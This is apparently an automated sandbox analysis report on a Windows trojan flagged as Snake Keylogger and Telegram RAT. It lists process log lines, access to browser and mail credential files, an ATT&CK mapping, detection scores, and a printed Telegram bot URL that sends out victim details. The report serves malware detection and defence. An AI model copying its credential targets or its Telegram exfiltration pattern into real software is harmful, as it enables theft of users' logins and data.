Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\SysWOW64\msiexec.exe VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\p7wgyD3kbI.exe

1_2_0040348F

Stealing of Sensitive Information

Yara detected Snake Keylogger

Source: Yara match

File source: 0000000B.00000002.2553419918.0000000021381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 7736, type: MEMORYSTR

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\msiexec.exe

File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\

Jump to behavior

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 7736, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 0000000B.00000002.2553419918.0000000021381000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: msiexec.exe PID: 7736, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	2 Obfuscated Files or Information	1 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 PowerShell	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Software Packing	LSASS Memory	14 System Information Discovery	Remote Desktop Protocol	1 Data from Local System	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	311 Process Injection	1 DLL Side-Loading	Security Account Manager	211 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	11 Encrypted Channel	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Masquerading	NTDS	1 Process Discovery	Distributed Component Object Model	1 Clipboard Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	131 Virtualization/Sandbox Evasion	LSA Secrets	131 Virtualization/Sandbox Evasion	SSH	Keylogging	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Access Token Manipulation	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	311 Process Injection	DCSync	1 System Network Configuration Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
p7wgyD3kbI.exe	69%	Virustotal		Browse
p7wgyD3kbI.exe	50%	ReversingLabs	Win32.Trojan.Leonem
p7wgyD3kbI.exe	100%	Avira	TR/Injector.pdwvk

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Supawn\Unbeholden\p7wgyD3kbI.exe	100%	Avira	TR/Injector.pdwvk
C:\Users\user\AppData\Local\Temp\nsm628F.tmp\nsExec.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsm628F.tmp\nsExec.dll	0%	Virustotal		Browse
C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Supawn\Unbeholden\p7wgyD3kbI.exe	50%	ReversingLabs	Win32.Trojan.Leonem
C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Supawn\Unbeholden\p7wgyD3kbI.exe	69%	Virustotal		Browse

Name	IP	Active	Malicious	Reputation
drive.google.com	142.250.181.238	true	false	high
drive.usercontent.google.com	142.250.185.97	true	false	high
reallyfreegeoip.org	104.21.112.1	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	193.122.6.168	true	false	high
18.31.95.13.in-addr.arpa	unknown	unknown	false	high
checkip.dyndns.org	unknown	unknown	false	high
197.87.175.4.in-addr.arpa	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
http://checkip.dyndns.org/	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:783875%0D%0ADate%20and%20Time:%2012/03/2025%20/%2008:55:50%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20783875%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://duckduckgo.com/ac/?q=	msiexec.exe, 0000000B.00000002.2555779773.000000002265B000.00000004.00000800.00020000.00000000.sdmp	false	high
